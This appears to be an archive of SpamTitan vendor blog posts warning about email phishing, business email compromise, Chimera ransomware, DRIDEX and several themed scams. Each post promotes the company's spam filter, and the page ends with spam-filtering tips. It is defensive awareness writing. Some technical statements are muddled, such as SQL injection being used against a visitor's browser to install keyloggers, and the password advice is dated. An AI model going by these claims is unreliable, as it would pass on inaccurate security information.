Send an email bulletin to your employees highlighting the risk that holiday email spam poses, and warn them that they may shortly start receiving phishing emails and other spam campaigns. They are likely to have forgotten how risky the festive season can be.
Business Email Compromise (BEC) Attacks
The FBI has already released a warning this year to organizations that perform wire transfers on a regular basis and/or work with foreign suppliers. They are being targeted by cybercriminals using sophisticated scams that start with the compromising of a business email account. Social engineering and phishing tactics are used to get employees to reveal their login credentials. Once access to bank accounts has been obtained by criminals, fraudulent transfers are made. Holiday email spam campaigns are expected to be sent targeting organizations and specific employees within those organizations. During the holiday period employees must be told to be ultra-cautious.
Holiday e-card scams
Holiday e-card scams are common at Christmastime. Criminals take advantage of the growing popularity of e-cards and send out spam emails in the millions telling the recipient to click a link to download their e-card. However, those links are sent to convince users to download malware to their computers. Any email containing a file attachment claiming to be an e-card is likely to be fake. The attachment may be malware.
Christmas and other holiday-themed screensavers are commonly downloaded by employees. These screensavers can be fun and festive, but may actually be malicious. Employers should consider implementing a ban on the downloading of screensavers as a precaution. Staff members should be warned that any .scr file sent in an email should be treated with suspicion and not downloaded or installed. Criminals mask attachments and the .scr file may actually be an executable file that installs malware.
Ashley Madison revelations and TalkTalk scams
A number of major data breaches have been suffered this year that have resulted in customer data being exposed. Criminals are threatening to expose personal data, especially in the case of Ashley Madison clients. Emails are sent threatening breach victims, informing them that they must pay not to have their data posted on the internet. Some criminals will be in possession of the data; other scams will be speculative. If an email is received, it is essential that professional advice is sought before any action is taken.
If you receive an email asking you to take action to secure your account after a company you use has suffered a data breach – TalkTalk for example – it is essential to only change your password via the official website. Do not click on links contained in emails. They may be phishing scams.
Free Star Wars tickets
You can guarantee that such a major event for moviegoers will be the subject of multiple email spam campaigns. Criminals would not pass up the opportunity to take advantage of the release of a new Star Wars film.
There are likely to be competitions aplenty, free tickets offered, and many other Star Wars spam campaigns in the run up to the release. This is the biggest movie release of the year for many people. Fans of the films are excited. They want to see snippets of the film, read gossip, and find out if Luke Skywalker will actually be in the new film. Many people are likely to fall for scams and click phishing links or inadvertently install malware.
Get prepared this holiday season and you can keep your computer and network spam and malware free. Fail to take action and this holiday time is unlikely to be jolly. Quite the opposite in fact.
Criminals are increasingly using ransomware – Chimera ransomware for example – to extort victims. Ransomware encrypts certain file types with a powerful algorithm that cannot be unlocked without a security key. Unfortunately, the only person to hold that key is the hacker responsible for the ransomware infection.
Organizations and individuals that perform regular data backups can avoid paying the ransom demands and not face losing important files. If files are encrypted, they can be recovered from backups – provided of course that regular backups of critical data have been performed. Worst case scenario: Some data may be lost, but not a sufficient amount to warrant a ransom being paid.
Criminals are aware of this failsafe and have recently started to up the stakes. The criminals behind Chimera ransomware have been found to be using a new tactic to scare victims into giving into their demands. Even if a backup file has been made, victims can be easily convinced to pay the ransom. They are told that if the ransom is not paid, the files will be made public. Confidential information will be posted on darknet sites or listed for sale in online marketplaces.
Criminals Target Businesses and Encrypt Critical Files Using Chimera Ransomware
Hackers are known to send ransomware out randomly. The more computers that are infected; the more ransoms can be collected. Chimera ransomware on the other hand is being used more specifically, and small to medium sized businesses are being targeted. This stands to reason. An individual may not be willing, or able, to pay a ransom. Businesses are different. They may have no choice but to pay to have files unlocked. If data are posted online, the potential cost to the business could be far higher than the cost of the ransom.
How are computers infected with Chimera ransomware?
Spam emails are sent to specific individuals within an organization. Those emails contain innocent looking email attachments: the types of files that would commonly be received by the individuals being targeted. Business offers are sent, applications for employment, or invoices.
Attachments may not be opened or could be blocked by spam filters. To get around this issue, hackers often send links to cloud-storage services such as Dropbox. The user clicks the link and downloads the malware thinking it is a genuine file.
Once installed the malware gets to work encrypting files stored on local and mounted network drives. The user is not made aware of the infection until their computer is rebooted. In order to unencrypt files, the end user must pay the ransom. This is typically $500 in the form of Bitcoins.
It is not known whether hackers have acted on their threats to publish company data. Many businesses have been too scared to find out and have given in to the ransom demand.
How to protect your business from Chimera ransomware
There is no such thing as 100% protection from Chimera ransomware, but it is possible to reduce the risk of infection to a minimal level. Installing Anti-Spam solutions can prevent malware from reaching inboxes; however not all products offer protection from phishing links.
SpamTitan software on the other hand employs a powerful spam filter which uses dual AV engines to maximize the probability of malicious emails being caught. It also includes an anti-phishing module to protect against phishing links. If you don’t want to have to pay a ransom to recover your data, installing SpamTitan is the logical choice.
Are you protected from Chimera Ransomware? Would you risk the publishing of your business data or would you pay the ransom?
If you live in Ireland, you may receive an email offering you a refund on your electricity bill; however, the email is not genuine. Scammers are targeting current and former customers of Electric Ireland hoping they will respond to the offer of a refund. By doing so they will receive no money. They will just have their bank accounts emptied.
The Electric Ireland phishing scam is highly convincing
The Electric Ireland phishing emails appear to be genuine. They give a valid reason for clicking on the link contained in the email, and have been well written. The link directs the recipient to a phishing website that looks genuine. Even the request made on the website is perhaps not unreasonable.
In order to receive the refund, customers must enter in their banking information to allow the electricity company to make a transfer. In order to confirm their identity, current and former customers must supply proof of identity. The scammers ask for a scan of customers’ passports.
Other reports indicate that some customers have been sent links to fake websites that require them to disclose their mobile phone numbers as well as security codes and passwords.
It is unclear how the scammers have obtained the email addresses of Electric Ireland customers, as according to the utility company there has been no security breach, and the database in which customer account information is stored remains secure. However, an audit is being conducted by the company’s IT department to determine if any individual has managed to infiltrate its network or has otherwise gained access to customer data.
A spokesman for the Garda has confirmed that many Irish citizens have already fallen for the Electric Ireland phishing scam and have reported that fraudulent withdrawals have been made from their personal bank accounts.
The Electric Ireland phishing scam is one of many highly convincing campaigns to have been uncovered in recent weeks. Online criminals have become more skilled at crafting emails and setting up malicious websites, and it can be difficult to determine whether a request is genuine or fake.
The Electric Ireland phishing scam may look genuine, but legitimate companies would not send emails requesting sensitive information of that nature to be disclosed over the Internet. It should also be noted that if a company has taken excess funds from a bank account to pay a bill, the company would be able to issue a refund directly to the same bank account. They would not require those details to be provided again – nor request copies of ID, mobile phone numbers, or passwords.
If any individual who has fallen for the Electric Ireland phishing scam they should contact their bank immediately and place a block on their account. This will prevent the criminals from making any fraudulent transfers. However, it may be too late for many customers to prevent losses being suffered.
To reduce the risk of falling for phishing scams, the best defense is to block spam and scam emails from being delivered. To do this a spam filter should be used, such as that provided by SpamTitan. SpamTitan Technologies Anti-Spam solutions also include an Anti-Phishing module to ensure all users are better protected from malicious websites when surfing the Internet.
Any time an email is received that offers a refund, it is ill advisable to click on an email link. Attempts should be made to contact the company directly by calling the number listed on that company’s website. The matter should first be discussed with the company’s customer service department. Never open an email attachment contained in the email, and never divulge confidential information over the internet unless 100% sure of the genuineness of the website.
UK workers are being targeted with a new email money transfer scam, according to a new police intelligence report. The current threat level has been deemed to be high enough to warrant a warning being issued by Financial Fraud Action UK to alert UK employees to the risk of attack.
Rather than the campaign being sent in mass email spam mailings, individuals are being targeted by criminals using a new spear phishing campaign that attempts to fool users into making a transfer from their personal account in order to secure an important work contract, or help resolve an urgent work issue.
The highly convincing scam involves the sending of emails to individuals in a particular organization that is being targeted. The perpetrators of the campaign have masked the email address of the sender, making it appear as if the email has actually been sent by their boss, a work colleague, or member of the accounts department. In some cases, the emails have actually been sent from a real account.
Email money transfer scam conducted in two separate attacks
Criminals first compromise an email account in the organization under attack by gaining access to an individual’s login credentials using a separate phishing campaign or by hacking passwords. Criminals have been able to gather a large amount of data on individuals via social media networks such as Facebook, Twitter, and LinkedIn. That information is subsequently used to craft convincing email campaigns to fool their targets into revealing sensitive information to gain access to their email accounts.
Those accounts are then used to send email requests to other individuals within the organization asking for a bank transfer to be made. The requests are out of the ordinary but, as explained in the scam emails, the payments are critical to the running of the business. Once a transfer has been made, the money is rapidly withdrawn from the scammer’s account. Victims are left with little recourse to get their money back.
The email money transfer scam has proved to be particularly effective. Employees see that the email has been sent by a manager and out of a sense of duty, or fear of job loss, they respond without first checking the genuineness of the email. Oftentimes, the perpetrators of the crime have sent emails from senior managers and partners’ accounts. An employee lower down the ladder would typically not usually have direct contact with these people, lessening the chance of them contacting that person directly to validate the request. Contact information is often provided in the email that will put the target in direct contact with the scammer, who will then validate the request.
Senior managers and partners are the initial targets in this new email money transfer scam. Criminals attempt to fool them into revealing their login credentials. Employees are the secondary targets who actually arrange the transfers to the fraudsters’ accounts. Both groups of individuals should be warned of the risk, and measures should be implemented to reduce the risk of the phishing campaigns being delivered.
To protect against the first attack made by the perpetrators of this email money transfer scam, it is recommended that companies make the following changes to improve security:
- Issue alerts to their employees, including senior managers, warning of the latest wave of phishing campaigns to put them on high alert.
- Enforce changes to email account passwords, ensuring that only secure passwords are used. Stipulate a minimum of 8 characters, force the use of special characters (!,”,£,$,%,^,&,*,(, or ) for example), and ensure that at least one capital letter and number is included.
- Purchase a robust Anti-Spam filtering solution to prevent phishing emails from being delivered to employee’s inboxes. SpamTitan also includes an Anti-Phishing module that can provide additional protection against complex campaigns such as this.
- Ensure that all Anti-Virus software has virus definitions updated on a daily basis
- Scammers often attempt to obtain login credentials by fooling targets into visiting a link to a malicious website containing malware. The sites may contain malicious code that probes for weaknesses in the target’s browser. The attackers then use SQL injection techniques to exploit software vulnerabilities and install keyloggers to obtain passwords. Anti-Phishing software can block these sites, providing protection even if an email link is clicked.
- Security vulnerability scans should be conducted regularly. Updates may be issued regularly so daily checks should be conducted. A scan may reveal a critical Windows 10 security update is required, or Oracle, Chrome, Firefox, Skype, or Adobe Flash may need to be updated.
- Inform employees of the company’s processes for requesting payments via bank transfers and confirm that under no circumstances would an employee receive a request via email to make a transfer to a senior manager or partner.
Protecting end users from becoming victims of an email money transfer scam
End users should also be informed about the correct actions to take when receiving email requests:
- This email money transfer scam relies on the user being fooled into thinking the email has been sent from a manager’s account. End users should check the email address used to make sure it has been sent from a company account, but to be wary that an email could have been hijacked.
- To contact the person who has made the request directly. Since email accounts may have been compromised, this should be done via telephone using the company switchboard or direct deal numbers, not the telephone numbers supplied in the email.
- To exercise extreme caution when receiving any request which appears to be out of the ordinary, especially when that request involves making a bank transfer or requests that sensitive information is disclosed.
- To read any email carefully, and then re-read it to identify spelling errors, grammatical mistakes or language that would be out of keeping with an email typically sent by that individual.
A new DRIDEX email scam has been discovered that has prompted an angry reaction from Swedish furniture retailer Ikea. The criminals behind the malware have targeted Ikea customers by sending fake emails encouraging them to open a DRIDEX-infected email attachment. It has been estimated that hundreds of thousands of emails have been sent in the past few days alone.
As is common with spam emails, users are not specifically targeted. Instead the senders of the emails rely on volume. This is why targeting a retailer the size of Ikea is particularly effective. The chances of an email arriving in the inbox of a customer is relatively high in Europe. Many individuals regularly visit IKEA or have done so in the past.
What is particularly worrying about this campaign is the fact the emails look genuine. They contain an attachment which appears to be a purchase receipt from IKEA. The receipt looks exactly the same as one supplied by the store.
IKEA is concerned that the spam emails will tarnish the company’s reputation, even though there is nothing the company could have done to prevent the campaign from being launched. The advice provided is not to open any attachments in emails that appear to have been sent by the furniture retailer.
What is DRIDEX Malware?
DRIDEX is a nasty malware designed to steal online banking login names and passwords, and is a new variant of CRIDEX: A known form of malware with a worm and Trojan variant (W32.Cridex and Trojan.Cridex). The new form of the Cridex malware achieves its objective via HTML injection. This is a technique used by hackers to inject code to exploit vulnerabilities in popular applications such as Java or ActiveX. HTML injection modifies page content.
This method of attack is effective as the user is fooled into thinking a site being visited can be trusted, as the page is located within a trusted domain. When the user enters a login name and password, these are then sent on to the hacker. In this case, the user would reveal their bank logins and passwords, which would then be used to make fraudulent transfers to a hacker’s account.
DRIDEX malware first emerged in November last year and attacks have mainly affected computer users in Europe. Due to the ease at which the perpetrators of this campaign can obtain users’ banking credentials, this malware is particularly dangerous. All users, not just IKEA customers, should be particularly wary about opening email attachments or responding to emails containing links to webpages, especially if the emails are sent from individuals not known to the email recipient.
The malware was first used in the UK, but has since spread around Europe and has now been received in Sweden where IKEA is based. To date it has been estimated that the malware has allowed the perpetrators of the campaign to obtain around £20 million from fraudulent transfers, in addition to $10 million from U.S. banks. IKEA is now monitoring the situation and is attempting to identify the source of the emails; however, since the perpetrators of campaigns such as this are typically mobile, it is particularly difficult to catch the criminals responsible.
How is it possible to protect against DRIDEX Malware?
Email scams such as this are becoming increasingly common and users can easily be fooled into installing malware. DRIDEX appears to be primarily transmitted by spam email attachments.
Fortunately, there is an easy way of protecting against a DRIDEX malware infection. Since spam emails are now becoming harder to spot, the easiest solution is to prevent DRIDEX emails from being delivered. To do that, a spam filter such as SpamTitan is required.
SpamTitan is able to identify spam emails containing DRIDEX as the signature of the malware is present in the Anti-Virus engines used by the software. SpamTitan uses two separate AV engines which increases the probability of the malware being detected.
Since new malware is being devised and sent with increasing regularity, all email users should also be taught how to identify potential phishing emails as a failsafe to ensure. This will help to ensure they do not become another email scam victim, or inadvertently compromise their employer’s network.
Email spam may not be the first choice of hackers for making money, but there are plenty of online criminals who still use email to fool users into installing malware on their computers or revealing sensitive information.
This week, two new email spam warnings have been issued following reports that consumers have received emails that have aroused their suspicions. When checking the authenticity of the emails received, they discovered they were scams. The warnings were issued by the Better Business Bureau (BBB) in an effort to prevent the scams from claiming victims.
The latest email spam campaigns differ from each other, but use tried and tested techniques which have proven to be highly effective in the past.
Jury Duty Scam Email Discovered
Trust in authority figures is being exploited in a new email spam campaign in which users are urged to take action as a result of missing jury duty. A similar email is doing the rounds warning recipients of an impending court case. Should the recipient of the email ignore the request, the case will be heard in their absence and they will not be allowed to mount a defense.
The emails shock recipients into taking rapid action such as clicking a link or opening an email attachment. These two emails are clever in the fact they warn users of the need to respond to a judge or turn up in court, yet the crucial information needed to do so is not supplied in the email body.
Any email recipient believing the email is genuine is likely to open the attachment or click a link to find out which court needs to be visited. By doing so they are guaranteed to have their computer, laptop or mobile device infected with malware.
The BBB was alerted to the scams and issued a warning advising recipients of these emails to delete them immediately. Advice provided saying the U.S. Courts would not contact individuals about jury duty by email. Letters are mailed or telephone calls are made in this regard.
Church Leaders Warned not to Fall for Money Transfer Email Spam Campaigns
The second scam was recently reported by the finance director of Grace Bible Church, who received a request via email to transfer funds to a senior pastor. In this case, the email appeared to be official, having been sent from the senior pastor’s email account.
It is a good security practice to always check the authenticity of an email that requests a transfer of funds. In this case all it took was a quick phone call to the pastor in question to reveal that the request was bogus.
If it is not possible to contact the individual, deleting the email would be the best next course of action. If the request is genuine, the individual in question is likely to make contact again. Spammers tend to send these campaigns randomly. A second request is unlikely to be received if the first is ignored.
The Fight Against Email Spam is Getting Easier
Spam email campaigns are still an effective method of malware delivery. Social media posts and infected websites may now be the preferred method of infection, but users must still be wary about opening attachments or visiting links sent from people they do not know.
Awareness of the tell-tale signs of an email scam has improved in recent years. So has security software used to detect phishing campaigns. SpamTitan Technologies is one such company that provides a highly effective spam filtering solution. It boasts an exceptionally low false positive rate and catches over 99.98% of all spam emails.
Part of the reason why SpamTitan’s Award Winning Anti-Spam solution is so effective at catching email spam is in part due to the power of the AV engines used. Instead of using one class-leading AV engine, it uses two: Kaspersky Labs and Clam Anti-Virus.
By installing this anti-spam solution, malicious emails used to phish for sensitive information can be blocked before they are delivered to an email inbox. Businesses looking to reduce the risk of end users infecting their desktop computers, laptops and portable devices with malware and viruses, will find SpamTitan’s Anti-Spam solutions for the enterprise highly cost-effective. Rather than purchasing a package that offers protection for far more IP addresses than are required, IT professionals can purchase a license that covers end users without wastage.
City of London Police are sending emails containing important information about a murder suspect. You must be vigilant, and if you see this individual, you should not approach him! The attachment sent via email contains his image, so you will know to avoid him and alert the police if you see him. Unfortunately, opening the attachment will make you a victim. You will not be murdered, but you may end up having your bank account emptied. Yes, this is a City of London Police email scam, and it attempts to convince the good, law abiding public to infect their devices with malware.
City of London Police Email Scam Warning!
One of the latest email scams to be wary of, especially if you live in the UK, involves spam emails with the subject “London City Police.” Contained in the email is a bulletin detailing a murder suspect on the loose, together with a malware-infected attachment.
Fortunately for the wary, there is a clue in the subject that the email is not genuine. There is of course no “London City Police.” The police force in question is called “The City of London Police.” That said, the shock of receiving an email from law enforcement about a murderer on the loose may be enough to convince many to open the email and the attachment.
As one would expect, the email contains a stern warning, with the content phrased in such a way that it could in fact have been sent by the police force. A murderer on the loose in London is a serious matter, and this cunning email spam campaign has been devised to play on the fear that such a matter is likely to create.
How would the Police force have got your email address, and those of everyone else living in your area? That is something that many victims of this email scam may ponder after opening the attachment. Of course, by then it will be too late. Opening the attachment will result in malware being installed on the victim’s computer.
Fortunately, email scams such as this are easy to avoid, in fact, they would not even get to the point of being delivered to an inbox, if precautions have been taken, as explained by Steven Kenny, Customer Support Manager at TitanHQ.
Kenny pointed out that by using SpamTitan, computer users will be protected. He said, “This malware was blocked by SpamTitan before it had a chance to make it to users’ inboxes.” He went on to say, “The malware contained in the attachment was flagged as a virus. The attachment is a zip file, once executed; the malware goes to work.”
SpamTitan Blocked the City of London Police Email Scam
The image below is a screenshot of the City of London Police email scam, which was successfully blocked by SpamTitan.
Current High Risk of Malware Infection
Malware poses a major risk to individuals, but businesses are especially at risk of infection. Employees may be wary of opening emails on their own devices, but are they as security conscious at work?
It is perhaps easier to believe that a work email address would be in the police database, rather than a personal email account. This may lead employees to believe that the email is genuine. Unfortunately, all it takes is for one employee to open an infected attachment, and their computer, and the network it connects to could be infected.
Since email is essential in business, protections must be put in place to ensure networks are not compromised as a result of the actions of employees. If malware is installed, the losses suffered can be considerable. It therefore can pay dividends to implement protection such SpamTitan spam filtering. This will prevent malware-infected emails from being delivered to employees’ inboxes.
A spam filter is one of the best ways to reduce email spam risk; however regardless of whether you choose this important email security measure, there are a number of steps you can take to reduce email spam risk, keep your devices protected, and your valuable data out of the hands of spammers and scammers.
11 Spam Filtering Essentials to Reduce Network Security Risk
Listed below are 11 spam filtering essentials that you can implement to reduce spam volume and the risk of cyber attacks.
1. A Real-Time Block List (RBL) is essential
Spam is commonly sent from a known spam server – one that has been blacklisted, or is known to be used by email spammers. Using a Real-time Block List (RBL) is one of the best protections, that will prevent malicious emails from being delivered to inboxes. This one email security feature has been shown to reduce spam email delivery by 70–90%, and it only takes a few minutes to implement.
Even if you use a spam filter this measure is important. It will reduce the load on your spam filter, email server, and network. An RBL works by blocking messages before they are downloaded, which will also help to save bandwidth. There are a number of ways to do this, although zen.spamhaus.org is one of the best. It is widely regarded as being the best at spam blocking, is updated frequently and importantly boasts a very low false-positive rate.
2. Recipient Verification will block spam sent to invalid email addresses
Spammers like to bombard companies with emails in the hope that some will get through, or that a catch-all is in place and all will be delivered. Common email addresses used are webmaster@, info@, admin@, sales@ etc. etc. These email addresses are commonly used by companies and there is a good chance that they will be delivered to someone. However, you can use Recipient Verification (RV) to reject the bulk of these emails, and only have properly addressed emails delivered.
To do this, use Microsoft Active Directory integration or upload a CSV file of valid email addresses to your spam filter and mail server. This technique will prevent speculative emails from being downloaded and will similarly reduce the load on your spam filter and mail server, and save bandwidth. This method of spam prevention will take longer to complete than setting up your RBL, but it is a worthwhile investment of your time as it will result in a major reduction in spam delivery.
3. Configure your server to require correct SMTP handshake protocols
This is one of the most effective methods of blocking spambots and it will stop the majority of spambot emails from being downloaded and delivered. This is a fairly quick task to complete, and should only take you a few minutes. You will need to set your configuration to require a HELO (EHLO) with a Fully Qualified Domain Name. However, it is important to note that it may be necessary to add some of your suppliers to a whitelist to ensure that their messages do not also get blocked. Not all of your suppliers and contacts will have their own email servers configured correctly, so genuine emails may be caught and blocked. Individual organizations will find this step particularly beneficial. MSPs less so, or not at all.
By using the above three spam prevention methods – which incidentally can be used on virtually all email servers – you will make a considerable bandwidth saving, and dramatically reduce the number of spam emails that are downloaded. This will also help to protect your network from malware. If you allocate just 30 minutes to do all three, it will save weeks of your time, which can be better spent on other cybersecurity tasks.
4. Regularly scan for viruses
A basic security measure is use is a robust and powerful anti-virus program, regardless of whether you use spam filtering. If you don’t implement spam filtering, this measure is especially important, as you are more likely to have viruses delivered to email inboxes.
Even with spam filtering in place, it is also important to have anti-virus software installed and, of course, AV engine and virus definitions need to be kept up to date. Software should be configured to update definitions automatically.
With spam filtering in place, it should be possible to stipulate the update frequency. Be aware that a different anti-virus can be employed to protect endpoints. Using the same AV engine for mail servers and endpoints means that if for any reason your AV software does not detect a virus, all endpoints could potentially be affected. By using a different AV engine for endpoints and mail servers, you maximize the probability of a virus being detected. Fortunately, competition is fierce in this market, so you should not have to pay top dollar to have two different engines in use.
The following steps will apply if you have a spam filter. These will apply no matter which spam filter is used, be that open source, commercial or even cloud-based spam filtering.
5. Certain attachments carry higher risks so block them!
Executable files – those with a .exe suffix – are particularly risky. Fortunately, it is not necessary to run the risk of a user double clicking on them. The best option is to block these file types and other risky file types if they are not typically needed by staff members. Be aware that spammers are sneaky. It is common knowledge that .exe files are risky, so they mask them with other extensions: PDF, XLS, DOC files for example. To counter this, block by MIME type, not by file extension.
6. Take Action to Block Phishing Emails
Phishing emails can easily fool employees into clicking on links that direct them to URLs loaded with malware. There are a number of URLs that are recognized as phishing websites and it is possible to block these quickly and easily. To do this, use SURBL and URIBL lists to check for website domains that frequently appear in unsolicited emails.
7. Ensure that your spam pattern library is regularly updated
You may find that your spam pattern library cannot be configured manually, as this may be hard-wired into your spam filter. Spam signatures are based on a huge database containing recently added spam, as well as past signatures, with the spam-fighting community adding to the database on a daily basis. There are many different resources that can be used, although if you want to ensure you have a fully up to date database of spam signatures, SpamAssassin is arguably the best choice.
8. Bayesian filtering will recognize more spam and block less ham
A Bayes engine is used by most spam filtering engines and can be trained to recognize spam, and differentiate it from ham (i.e. not spam). It is therefore important to use a regularly updated spam pattern library, which will assign incoming emails with a score, in addition to using feedback provided by end users. The Bayes engine learns what is spam and what is not, and will apply the lessons learned to new emails that are received, constantly improving its detection rates to ensure all spam is caught, and false positives are reduced.
9. Stipulate the spam score that is right for your company
As a system administrator you have the power to decide what spam score is right for your company. This will depend on how much risk you want to take. You will find that spam filters will usually allow you to dictate how aggressive they are, although you may find this requires a certain degree of tweaking to ensure that spam doesn’t get through and ham doesn’t get accidently blocked. A spam score is assigned by a number of factors, although the type of attachments and the email content are the two main ways that the spam score is calculated. This process is not particularly time consuming, but bear in mind that the first two weeks after your spam filter has been installed is when this task will need to be completed. Be sure to use your trial period to tweak your spam filter to ensure that spam is blocked and the number of false positives are kept to a minimum.
10. Get your end users working for you
Your spam filter will not always get things right, and some spam and junk emails will slip through the net from time to time. It is therefore useful to instruct end users to manually mark any spam and junk emails received, should they get delivered to their inboxes. End users can help to train your Bayes engine to recognize new spam emails and correct false positives.
11. Provide email security awareness training to employees
Nowadays it is essential that all staff members receive security awareness training. They must be taught how to identify spam emails, phishing campaigns, and potential viruses. They must also be informed of the correct actions to take if they do discover a phishing scam or suspect that an email may contain malware or a virus. Also instruct them on the correct actions to take if they do accidentally open a suspicious attachment.
Is it the job of a system administrator to train employees how to protect themselves and their computers? Arguably it is not, but it can save a lot of headaches down the line. Even a little training can go a very long way. Unfortunately, this is an area of email security that is all too often forgotten.
What is essential, is that employees are aware of the risks of falling for a phishing campaign or downloading malware. In some cases, it could spell the end of a company, and along with it, their jobs. You can always use CryptoLocker to scare employees into paying attention.
Training could well make all the difference. Besides, if you do provide training and employees still take risky actions and infect the network, you will have a clean conscience and can say it is not my fault! And be justified in saying it.